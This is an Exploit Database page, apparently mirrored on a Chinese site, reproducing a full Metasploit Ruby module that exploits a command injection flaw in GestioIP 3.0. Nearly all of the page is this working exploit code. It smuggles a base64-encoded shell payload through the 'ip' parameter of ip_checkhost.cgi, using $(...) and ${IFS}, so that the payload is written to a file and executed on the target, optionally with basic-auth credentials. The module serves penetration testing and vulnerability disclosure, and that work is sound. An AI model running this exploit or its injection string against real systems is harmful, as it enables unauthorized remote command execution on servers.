GestioIP – Remote Command Execution (Metasploit)

• Exploit Database
• 16 阅读

• 作者： Metasploit
  日期： 2013-10-08
• 类别：

  • remote
  平台：

  • unix
• 来源：https://www.exploit-db.com/exploits/28810/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'GestioIP Remote Command Execution',
  'Description'=> %q{
  This module exploits a command injection flaw to create a shell script
  on the filesystem and execute it. If GestioIP is configured to use no authentication,
  no password is required to exploit the vulnerability. Otherwise, an authenticated
  user is required to exploit.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'bperry'#Initial Discovery and metasploit module
  ],
  'References' =>
  [
  [ 'URL', 'http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/' ], # Patch
  [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2461' ], # First disclosure
  [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module' ]
  ],
  'Payload'=>
  {
  'Space' => 475, # not a lot of room
  'DisableNops' => true,
  'BadChars'=> "",
  },
  'Platform'=> [ 'unix' ],
  'Arch'=> ARCH_CMD,
  'Targets' => [[ 'Automatic GestioIP 3.0', { }]],
  'Privileged'=> false,
  'DisclosureDate'=> 'Oct 4 2013',
  'DefaultTarget' => 0))
  
  register_options(
  [
  OptString.new('TARGETURI', [true, 'URI', '/gestioip/']),
  OptString.new('USERNAME', [false, 'The username to auth as', 'gipadmin']),
  OptString.new('PASSWORD', [false, 'The password to auth with', nil])
  ], self.class)
  end
  
  def user
  datastore['USERNAME']
  end
  
  def pass
  datastore['PASSWORD']
  end
  
  def use_auth
  !(pass.nil? or pass.empty?)
  end
  
  def exploit
  
  pay = Rex::Text.encode_base64(payload.encoded)
  file = Rex::Text.rand_text_alpha(8)
  
  options = {
  'uri' => normalize_uri(target_uri.path, "ip_checkhost.cgi"),
  'encode_params' => false,
  'vars_get' => {
  'ip' => "2607:f0d0:$(echo${IFS}" + pay + "|base64${IFS}--decode|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004",
  'hostname' => "fds",
  'client_id' => "1",
  'ip_version' => ""
  }
  }
  
  if use_auth
  options.merge!('authorization' => basic_auth(user,pass))
  end
  
  res = send_request_cgi(options)
  
  if res and res.code == 401
  fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Please provide USERNAME and PASSOWRD")
  end
  
  end
  end